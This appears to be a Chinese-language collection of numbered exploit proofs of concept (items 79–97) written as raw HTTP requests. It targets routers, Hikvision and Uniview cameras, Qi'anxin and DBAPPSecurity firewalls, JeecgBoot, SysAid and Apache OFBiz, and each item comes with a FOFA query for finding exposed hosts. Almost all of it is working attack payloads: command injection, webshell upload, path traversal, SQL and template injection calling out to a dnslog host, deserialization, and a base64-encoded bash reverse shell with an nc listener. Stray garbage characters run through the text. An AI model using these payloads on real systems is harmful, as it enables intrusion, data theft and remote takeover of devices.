2 Z5 p; z: x/ U8 _5 T: A, G9 r! R2 AContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
5 G3 ~) ^$ g: ^Content-Type: image/png6 N; d D" Y! y+ v1 O/ {
8 w- l8 n `. [1 R6 ?% |0 OYsOxWxSvj1KyZow1PTsh98fdu6l
2 y) `7 l: ^& ]" q5 }+ l+ C------YsOxWxSvj1KyZow1PTsh98fdu6l/ s) A# ~2 P2 K O3 O
Content-Disposition: form-data; name="target"
7 y) l7 Q, K5 K. W" p6 n0 F
n. p, ]# C4 ~" K2 M/Applications/SkillDevelopAndEHS/1 l! g& U& D( {' N5 ?
------YsOxWxSvj1KyZow1PTsh98fdu6l--
6 L. W% S" o2 U, {: p6 g
. j4 ^% R! N3 ~7 a) q) G+ H- q6 O# t5 q: `9 ~
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
7 L; U" f4 D% y2 d4 L& x/ R9 aHost: x.x.x.x% R$ T, ~3 W1 _9 O/ {; |6 J5 M
7 J* d$ M2 n/ w$ |- D, a5 |$ }& V
| U+ Z$ [) f3 ^& t( }, ~+ G79. BYTEVALUE 百为流控路由器远程命令执行2 \+ S2 X5 V; j& }; _" ^7 S: B
FOFA:BYTEVALUE 智能流控路由器
( t+ `0 f2 R8 ?4 c3 uGET /goform/webRead/open/?path=|id HTTP/1.1/ p/ t2 D3 x( u& {. v% x; I _$ F$ q) m
Host:IP
: ^! ~4 ~, \# QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.04 ?9 | c) J4 Q; b1 U$ E! q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
/ ?: u v+ y. i; M0 lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2! g; Y5 i( a. S2 p0 x
Accept-Encoding: gzip, deflate0 q& t4 v6 z4 P4 K
Connection: close6 I* q/ J; D K# {4 T
Upgrade-Insecure-Requests: 1
. q; S0 U, D+ i0 E1 Z! q8 p
" ?5 s1 R& o$ @4 Y+ C5 ~; y; U% j" g$ c9 [$ z; C
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
# G' |3 V5 ?3 zFOFA:app="速达软件-公司产品"
9 z3 N$ j5 J2 a8 }& jPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1' z+ D e4 i9 P
Host: x.x.x.x7 `: r2 i9 ^. W5 n4 g
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
; Z0 C) H* I; B3 J4 n" l" \% @Content-Length: 27
- h p3 B0 V5 p+ s sAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8- D) Q3 m" T7 m
Accept-Encoding: gzip, deflate2 ?- L$ [1 u. r5 k; W
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 d8 s$ f J, o2 M% k0 a3 k; pConnection: close% r V. o+ }4 u* } H
Content-Type: application/octet-stream
* \ ]* N* }6 T) g; t' n9 uUpgrade-Insecure-Requests: 1
6 b3 y t, ]- [. f
3 h3 e$ T. x% Q2 a<% out.print("oessqeonylzaf");%>* M2 {; w0 @8 Q5 ]- ^
9 e, R# S( @5 n5 x, r) X( }% t
- j# l$ S! ~. d, y- i
GET /xykqmfxpoas.jsp HTTP/1.1" J% O! ` ?$ X8 k% w
Host: x.x.x.x. c6 j* E% i) j; K7 j$ X& ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 `' P6 _4 h9 Q6 @' ?; a: bConnection: close9 X. `4 J& M9 v9 P
Accept-Encoding: gzip# V! l7 m, G4 E u. C
+ ]8 c5 {. a8 a8 |. ^0 l/ d
2 }3 I$ J, E' \7 w81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露+ A) E( A) R, U. K# O, m
FOFA:app="uniview-视频监控"
* h$ U* M. a1 Q3 I I+ CGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
! H9 Z, I+ S6 N/ q! ?0 s9 mHost: x.x.x.x5 w" u) E% S k8 g" \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 \' V: @. G8 z" A! mConnection: close0 u/ E! _: |) {7 N
Accept-Encoding: gzip) [0 L$ ^5 }# ^: i3 C) v
. x6 T1 R( F9 A2 _: M
" H+ x: x" j- ?. ]2 K; q82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
- f& ?* D- Z- \# `$ M+ ?6 ~5 jFOFA:app="思福迪-LOGBASE"
' f: e& ]5 c4 U4 a b x) ?POST /bhost/test_qrcode_b HTTP/1.1
1 V; t L [' H4 y/ q# r+ THost: BaseURL
/ C, U9 B+ w2 ~+ w/ oUser-Agent: Go-http-client/1.1
+ C! w2 c% Y! UContent-Length: 23 ?) r, d! [4 J1 l# T
Accept-Encoding: gzip! \ q2 V/ G+ l! Q
Connection: close0 |9 F, x/ K$ e, N
Content-Type: application/x-www-form-urlencoded5 w6 g, r8 Z! {. D
Referer: BaseURL
" U/ f% x9 X& A
% m" X0 r8 O* n& z+ Z* Ez1=1&z2="|id;"&z3=bhost
% {1 v1 O k; g! w9 b4 L' _, ~6 u
2 \) l1 I0 e4 F. U% H
0 r5 [& t, _% O: c# F83. JeecgBoot testConnection 远程命令执行
; G% E9 j- A1 c! Z# \FOFA:title=="JeecgBoot 企业级低代码平台"
( h5 X/ K! t: U8 \% w- Z/ u# c/ X' V* K! ?
; M. Q& S/ O8 Q7 |; D2 R1 [- v1 U, KPOST /jmreport/testConnection HTTP/1.1
7 A4 p( P3 m( ~, ^9 aHost: x.x.x.x3 b$ t) e* ^3 V, i. `* j2 S% r9 q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.154 {2 ]- W( ]$ d6 ?
Connection: close1 V) r* q# t, V9 y% r+ P5 ^
Content-Length: 8881
% s2 o9 ? _+ s# M; cAccept-Encoding: gzip
7 y% Y( h' A- Y$ JCmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
9 z7 a/ n7 e% Q4 @Content-Type: application/json
# d! [6 g% @1 a. ~
" G {8 d6 m! e( T/ KPAYLOAD( t% ^3 X/ ^. O* j
1 m% N4 u! J. `1 v* B; P# N
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入3 H+ `: a9 d& s: J; J
FOFA:title=="JeecgBoot 企业级低代码平台"& c/ W) k1 ^; p F5 j y+ k2 T
* o d Q5 |# w( c& ^6 E
2 \: X. W; T; P& C! @2 |4 \) P$ t
$ B( h( y$ P i* P1 C2 t1 Z0 ]( I6 IPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.10 K6 Q; L- Y% J. q
Host: 192.168.40.130:8080
9 C: \/ k9 |# |* m% y5 cUser-Agent: curl/7.88.1# J z8 x2 q, J& l( o' ~
Content-Length: 156, u0 c9 Z7 I0 y7 e$ d' v! [' T
Accept: */*
: n5 d3 r' o& M5 `2 [2 N8 oConnection: close+ _' H1 C" O# `$ H# Y# I7 N6 k/ P' B
Content-Type: application/json
- z: ^6 |) i$ I# e: U8 GAccept-Encoding: gzip
* k3 f' b4 W/ u6 y8 P( {( l
3 m: e5 w6 P$ _$ G9 N{
, u4 a' |) G$ a2 v "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
1 ~$ c0 q0 ?8 s5 k5 m w "type": "0"
& s: ?! k2 K% V2 B% y}0 `& p1 r# {* Y) }: O! D! i
; h* o; T% \3 \5 r# K
- K- L# x1 l6 X9 a: X
85. SysAid On-premise< 23.3.36远程代码执行
- \- i K# C% T! v) n5 NCVE-2023-47246& h. g* Y( Y! U6 ^6 y
FOFA:body="sysaid-logo-dark-green.png" 9 v* w8 K3 i; B8 ]2 L, m# K3 _8 I
EXP数据包如下,注入哥斯拉马
& m, W' D p* ]3 Y/ F( s7 s$ r* B8 rPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
3 f! S3 v+ B5 a9 j: h: @8 @+ YHost: x.x.x.x
. }& `# U1 B# P( {. ~( e, UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
& y- r- ^" h3 M% T {- i6 @Content-Type: application/octet-stream6 [$ M- k" y. z) h) c' v% X
Accept-Encoding: gzip! F! x1 A7 G' f4 C% g* L
* Y+ {' [8 m+ m# h: p/ \( ^5 R2 z' g
PAYLOAD' i( ~4 P z0 }: V, V. O& n- U- b
& Y7 y; u8 \1 x0 Z a7 |5 X* y& w# s回显URL:http://x.x.x.x/userfiles/index.jsp
7 G, D) V9 U N' k1 \
3 E9 |8 V/ Y! ]- B$ Y$ v* n3 ]86. 日本tosei自助洗衣机RCE9 L! v7 S2 z: k4 _2 q# `
FOFA:body="tosei_login_check.php"
" i4 A! [6 `* UPOST /cgi-bin/network_test.php HTTP/1.16 b- [# p% `0 k P: t; |
Host: x.x.x.x
, D" g! h" s8 XUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
3 L5 G4 W9 c- b- UConnection: close* V1 \; Z9 D+ F9 p T2 }
Content-Length: 440 ?- o/ ?$ v' S% y
Accept: */* m3 [9 d$ H8 U6 }7 b
Accept-Encoding: gzip5 n7 d$ G$ [$ N+ e1 k
Accept-Language: en$ b+ i% x O* s1 a: ]
Content-Type: application/x-www-form-urlencoded
# \" ]; I+ g- N$ S# h8 d8 m H5 N, a L- |+ `/ G3 n8 z' B
host=%0acat${IFS}/etc/passwd%0a&command=ping/ F: J" y# F; }; {' f5 k) Q
I& m. A0 R M- T; G6 d) l4 ?
# z1 @' T3 M4 M9 j7 D9 O+ u87. 安恒明御安全网关aaa_local_web_preview文件上传
; j# J+ n& i( I9 b" ^FOFA:title="明御安全网关"4 S2 F j5 M' t7 D
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
: I1 d6 [4 ], Z; T, GHost: X.X.X.X
, @& _9 ?. r. n, cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. L6 c. [3 {* R( g
Connection: close# P- o2 L3 I% y+ ?! ^5 B
Content-Length: 198# D! }' s2 \4 |+ x+ U# k
Accept-Encoding: gzip
7 c9 W' [2 @$ f3 ? }( h; l2 lContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
, [4 A* y; M9 [- x8 x7 g! m
( B; w9 j! a" x. K) F--qqobiandqgawlxodfiisporjwravxtvd% M. e" w9 I, u8 [, i
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
?" v0 C7 f3 H; X2 r5 S& q6 UContent-Type: text/plain! U* I! t3 `. W. y' n
$ v _$ @ U) ^: G _) X$ ^6 Q" ^2ZqGNnsjzzU2GBBPyd8AIA7QlDq
. P+ b, C5 n( K2 B* Q--qqobiandqgawlxodfiisporjwravxtvd--( V4 v# @+ K% z
+ z" M- J& @. B6 ]6 A% R
+ N0 l, R& A: P, z2 Y/jfhatuwe.php
# G+ J3 ^" o: D& D+ y3 W x- G2 M, l4 E% _$ b6 Q+ n
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行' d4 h( U7 u+ ]" F& y
FOFA:title="明御安全网关"
$ q. j; }- n' T. [; N9 ?GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1& k/ Y+ L( m' ^$ J* k
Host: x.x.x.xx.x.x.x
8 M6 q L) L: u% E) }7 B0 g# e4 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! @! r- w( z4 @0 P
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 Z/ \( g `- M1 e, }# ^% w! wAccept-Encoding: gzip, deflate4 G+ W$ T3 r8 ~& M |9 P
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2. ?4 D1 }, Z0 N: s1 g# v
Connection: close
2 p. _ U% P3 Z. Q0 j
9 e+ L" @2 J% `& t# v2 X M
1 a7 n7 K ]8 M5 u: ~+ B/astdfkhl.php' }/ r: L1 A# W; j. b6 {1 N* a
* L8 T# W( S1 T1 r+ n% Z2 j
89. 致远互联FE协作办公平台editflow_manager存在sql注入# X( L! {4 K+ k4 t' c' f, m1 f) R
FOFA:title="FE协作办公平台" || body="li_plugins_download"
. W9 L" y4 @* v- F- }% z0 `POST /sysform/003/editflow_manager.js%70 HTTP/1.1+ T' F; _2 a/ Y# [5 Z' R
Host: x.x.x.x
, ]' d' g! j5 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# p# m# h8 D/ z# v
Connection: close
! w* t* w2 c1 d# \& OContent-Length: 41
J( H9 k' s% E$ @2 `Content-Type: application/x-www-form-urlencoded
3 t0 \6 f3 F/ { H8 AAccept-Encoding: gzip
1 F# P( @8 P8 E+ f" t+ g9 N) O0 S. o2 a3 q
option=2&GUID=-1'+union+select+111*222--+% @7 E7 X! r( t; J$ g: t' ~; i
& H+ l. G% y1 A6 \0 b8 d0 x8 ~5 W0 R1 k; w+ c) Y3 G
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
; u& Q: H1 K v2 T2 r' `! U1 FFOFA:icon_hash="-1830859634"8 T7 [. _1 }$ M6 N" L) T
POST /php/ping.php HTTP/1.1
+ A9 \. g* B/ ?' N8 M XHost: x.x.x.x# C1 e2 t% z1 W6 g4 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.07 A2 }4 Z# L* j1 A- b% i
Content-Length: 51
. j D/ l8 |) b4 G% o/ UAccept: application/json, text/javascript, */*; q=0.01' j: C9 i3 g/ [) X
Accept-Encoding: gzip, deflate4 B8 R, I) t# y! p1 i; e
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 @; X2 v$ k1 ^3 t2 e$ G( ]+ r7 b# oConnection: close" A |, A4 D" I C( j! x7 }
Content-Type: application/x-www-form-urlencoded
) O' p2 Q0 h1 g( I8 aX-Requested-With: XMLHttpRequest
/ I# |: P0 h3 z% ~: f9 n! J3 D
1 |2 U& [. n3 F& k+ t; }/ ojsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig/ ^/ P8 R) o9 X1 c
" d4 {# {0 T2 T5 _! x+ @" E) }* \$ L) I. o
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
' e) V4 ^! N) \$ e2 ^) ?) ]: y2 LFOFA:title="综合安防管理平台"' {" l# E5 f/ q" ? `. f
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1, `* N: a& ~8 |2 \4 l8 I
Host: your-ip
" O& q4 Y7 S) n: l( C% y) L- ?' S) mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
4 ?7 K+ g: x! {Accept-Encoding: gzip, deflate. `* u- q V7 j# m- U' [2 v
Accept: */* ]# w# N: C8 x" Q4 Q7 m
Connection: keep-alive
8 W! v5 A/ [5 B) R# D0 r7 E
' b1 n! @$ _4 d: X5 ?% `; M- L5 F' d5 r; w- s& v! h7 ?- j
$ n, q# h/ {- H, H$ s7 ^. B92. 海康威视运行管理中心session命令执行6 @: ~2 v. a8 Z7 m7 j$ C$ F, \
Fastjson命令执行) f( f( h) I3 H8 d. _: Q. j n
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76", H8 @6 |6 X! p! L% h0 ?
POST /center/api/session HTTP/1.12 K$ i( c' Y! Q0 G% f
Host:1 b; u/ K ^6 \5 z. P
Accept: application/json, text/plain, */*& e" u f/ s( `0 ^
Accept-Encoding: gzip, deflate3 `" P; B: W$ @& p
X-Requested-With: XMLHttpRequest6 S8 \9 W" @2 f0 y1 s/ L
Content-Type: application/json;charset=UTF-8
8 v' }; ~* c) h4 L4 e% `X-Language-Type: zh_CN
1 A5 r6 q& L' n/ M% P: MTestcmd: echo test
, T6 a% ]5 Q' Z; ^( ?1 l, IUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
D- [0 I5 k9 ?$ ~Accept-Language: zh-CN,zh;q=0.99 \ a1 A4 V4 K+ f
Content-Length: 5778% T6 b$ A+ y0 }9 b% y, n
0 \$ X3 ^7 }$ [# H3 f/ {; L
PAYLOAD
, E0 ?1 V6 x1 r: I9 _' I, ^4 F/ R/ ?5 I9 f' e
' }+ H. Y+ w6 |" P93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传/ \$ [! e3 {7 ~$ s1 j
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="" j7 b$ s! C b! C p% S+ {
POST /?g=app_av_import_save HTTP/1.1( }: T R+ s0 J1 Q! W) g+ W
Host: x.x.x.x5 H9 l! C1 [5 ?' ]7 O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
# {" O/ x' k7 R6 b! zUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ |6 S/ r/ Q/ B# d9 _
; s; R5 E& Q: g9 ^2 _------WebKitFormBoundarykcbkgdfx, q0 s2 g3 e4 f# k K8 q
Content-Disposition: form-data; name="MAX_FILE_SIZE"
( E8 N6 M6 L# q- U: H3 d" o
+ b# x4 e: P2 v& }10000000: \: K: M( S# h9 ]2 e2 @ Y) M( i
------WebKitFormBoundarykcbkgdfx) X+ S, \( `; ^/ O; i
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"3 I, O( X" k3 s- F3 r6 D
Content-Type: text/plain2 q8 D; x, g6 Y, X! l" {
2 q9 i# q8 Z% I* ~- K s+ C
wagletqrkwrddkthtulxsqrphulnknxa
2 ^2 {6 M7 U! {, _------WebKitFormBoundarykcbkgdfx D$ T* e3 Q' O4 a
Content-Disposition: form-data; name="submit_post"
, Q# n+ N+ m/ a3 o8 u* h
^. s: U. O7 h* ?+ x$ {, Robj_app_upfile
8 g/ [* [# ~ V& ^9 l------WebKitFormBoundarykcbkgdfx2 I+ c( e' }. {/ |
Content-Disposition: form-data; name="__hash__"
2 e, P& s& U0 J
% X5 i! M2 ^1 p* J: t1 E0b9d6b1ab7479ab69d9f71b05e0e9445+ Z; e5 u; y+ P, h
------WebKitFormBoundarykcbkgdfx--
: R4 N+ J0 G; j; Z4 b1 e- O4 ~: e$ K9 _
. ~9 [9 g7 p- I0 y" S! s0 w( \
GET /attachements/xlskxknxa.txt HTTP/1.1
/ Q0 e# r8 ?/ B5 P7 zHost: xx.xx.xx.xx- h' G6 |( b- q
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
+ X5 n1 v( ]/ {
8 S s! ^, v+ h7 u. B% k6 H9 k1 b+ r8 {; \
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传2 w* R1 o" b( x7 k/ z9 R
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="& x. B7 T6 O0 d- f4 r' f! k
POST /?g=obj_area_import_save HTTP/1.1% w3 p* }# a# G2 e: i! Y
Host: x.x.x.x
2 G, Z% v0 a7 z5 k- \/ mContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
$ { z, ^' `3 x1 J/ wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.366 z1 L! b5 I" p. S
/ r8 v I1 \; z# q------WebKitFormBoundarybqvzqvmt
8 Y# l# K! c* H5 m+ K! w& LContent-Disposition: form-data; name="MAX_FILE_SIZE", V% e7 R( s6 a7 L: B a8 ?
+ Z0 i$ z6 }& a4 f- K7 v
10000000$ k6 H4 c$ W5 O2 ]. b. i
------WebKitFormBoundarybqvzqvmt
5 r5 m5 r1 E/ c6 G9 BContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"8 _- Y+ w1 ?0 \, f3 \
Content-Type: text/plain! t* G/ E$ X5 k }1 H6 o
! a6 V) b& X: a/ j
pxplitttsrjnyoafavcajwkvhxindhmu7 K* J6 Y/ g# z
------WebKitFormBoundarybqvzqvmt
1 y4 o- n4 N6 X& F$ q5 C: a, i/ p9 WContent-Disposition: form-data; name="submit_post" f' |0 ~9 b' w( b! E- E( }* }
+ _% r6 M, P- K# U. v3 y& B. ~6 O/ _obj_app_upfile7 r! R# r* g. a
------WebKitFormBoundarybqvzqvmt
1 a5 y6 a7 e7 Q5 r3 p& d ?Content-Disposition: form-data; name="__hash__"+ y$ \% X6 c; Y& S
$ `8 k: k9 l' h( B
0b9d6b1ab7479ab69d9f71b05e0e94450 D) ]) K/ v. [
------WebKitFormBoundarybqvzqvmt--
* U8 B1 i6 h- Q3 u& P6 _/ h
7 ^1 A! {" h: n% ]& l+ r. ?; M9 S Z6 r n' j7 s
; y* P }. f) _2 \/ iGET /attachements/xlskxknxa.txt HTTP/1.16 _4 E) Z0 _2 ]( X7 g
Host: xx.xx.xx.xx" C$ h; l# K" a/ {
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36: N {4 O2 v8 i- l ^) D
8 t$ k4 j( \8 s$ _5 T' c9 s! i
3 h1 Q6 ], R/ r/ q
9 \& ]0 j/ n+ U0 W ?9 G5 y- c! E95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
# H7 q# Y$ T/ cCVE-2023-49070
* F- Z) G1 ^/ Y M( J- lFOFA:app="Apache_OFBiz"; B# s6 k; i7 ^. @% _
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1. Z1 Q! s& i; T+ ?) O
Host: x.x.x.x u i# D4 ?0 A2 a0 M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ x, ?' ?( d" E% R3 f5 ~0 v% J$ N' z! RConnection: close
) \/ \3 G4 R- `4 y# uContent-Length: 889
3 P- ~2 K9 Z7 l' y: mContent-Type: application/xml
( V5 S/ l* \, s# C9 B8 Q3 z* vAccept-Encoding: gzip$ Z, H; i- o7 g7 S# C
3 s7 M5 b4 E: g$ C2 z5 Y
<?xml version="1.0"?>! r2 |$ [$ |- f2 c+ b& K3 H
<methodCall>8 w- C; [! |- I7 N& E
<methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
8 L/ V4 ?% C. z8 t& `* W* g <params># {4 ^8 g( w' c4 O/ k8 Z" h$ e
<param>- w5 |7 ?1 C9 |7 i, E; w
<value>
3 l4 @! ~9 o7 u3 x+ P <struct>
; g3 i$ S* d7 |. [' o0 N <member>
, c8 a u7 h3 Q: |" q <name>test</name>6 u5 \/ W, P. n: J
<value>
- X+ G3 ]/ H- ^3 Z' J2 b6 o% y <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>" t I7 G P, U
</value>
% t7 A! p" G- m8 T" L c </member>7 e& M7 i# |9 Y F
</struct>3 e, B0 [/ {, v2 q5 C4 U6 y
</value>
) W; @' q7 D5 l5 k% E: G7 E </param>
! {$ a; E, y# ^; x) |* I </params>
8 u; }- W! B2 e- K</methodCall>+ `& L. f* u T7 j
6 V2 M- ~( x) ~- c. c; W% o
" X. x4 x- o- D0 d2 d A, ], M
用ysoserial生成payload6 f1 P% h' J- V2 b
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"
* C, y; p5 R3 B; E H5 E
B5 D1 u" c3 u0 l, ^
8 e- [; v! M* h/ [) L将生成的payload替换到上面的POC. v) P7 e7 q+ k4 V3 V
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
$ s+ \6 C: m) L% PHost: 192.168.40.130:8443
) @* D" q& s O# [, C' PUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.362 H ]- E! M- }; e+ V: x5 g
Connection: close( H5 ]& V) H9 B: L* E9 {
Content-Length: 8891 I' L z& i+ e* s1 C
Content-Type: application/xml
2 G2 b$ D' V1 m5 dAccept-Encoding: gzip, _: p1 V- Y4 l+ I6 l3 i0 C
: w0 S8 v% g8 K" r5 a8 O
PAYLOAD
3 F; |# d- J, b m- }" _( |- N8 b9 M$ r4 N; W
96. Apache OFBiz 18.12.11 groovy 远程代码执行$ Q8 n% Z4 Z2 W' Q& h0 l- ~8 r* P
FOFA:app="Apache_OFBiz"
" }% g$ @. H' A! s$ w3 DPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
8 U8 Q) A) ] Z r% W/ aHost: localhost:8443" u' H+ n" {, i1 J+ ?7 l: ]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
1 y* c. u5 z U" FAccept: */*5 ?8 y# a% ~& c3 V! E* b8 m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# A( R" j& A2 ^% @. ^" N5 hContent-Type: application/x-www-form-urlencoded
" i- Y- j9 K( R3 ]* u! ?Content-Length: 55+ ]5 a' f' t6 R! O& X2 S. T
' W c( A- i5 Y% QgroovyProgram=throw+new+Exception('id'.execute().text);
/ @+ T0 Y+ Z- @+ }7 O9 Z. d5 M3 R: m. u) w y/ D* y% q# O
/ f6 e8 d4 ?5 ~/ F
反弹shell
3 p) h) b7 {' O在kali上启动一个监听1 x- k4 \1 N3 g9 K' @* S q# t3 l3 m
nc -lvp 7777 H& Q; p" ~0 x* P. A3 k/ u
5 E! o. r/ f* b! w2 [
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
: G& i$ p8 ^8 W* G. W$ T8 G( ?9 RHost: 192.168.40.130:84431 |- X3 l0 [" p- D& K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
# M F- d! E+ L- TAccept: */*
+ Q) Q/ Z8 `9 y3 Y3 r. \# Q5 BAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ E$ Y: y1 ?; ?
Content-Type: application/x-www-form-urlencoded
5 a2 Z5 w4 ]2 u7 b0 m/ m7 O2 b: \Content-Length: 71
e Q& Q B2 m- t1 H
7 }7 I/ r) h- v4 bgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();5 P3 `. T/ s* \: U3 n9 d$ @; [
7 V" [ W8 h+ J' E( I
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行8 M# `/ ^6 B$ x4 k" D" C0 J: B9 w
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
* F. b- T- A4 c5 ]/ W/ SGET /passport/login/ HTTP/1.1( A% D! E" j9 O: }
Host: 192.168.40.130:8085+ F: N% b1 A* @. |( Q/ ^0 l
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15, v, L1 H3 t9 M5 K# |1 S
Accept-Encoding: gzip
t! V; d: b* A7 C8 f0 f' Y! o, RConnection: close3 H V& \* U+ G6 G* j8 M
Cookie: rememberMe=PAYLOAD% d; A* r) o$ r; L6 A
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"2 H% u c0 M3 j1 a
# x# f* e* H# R+ E m
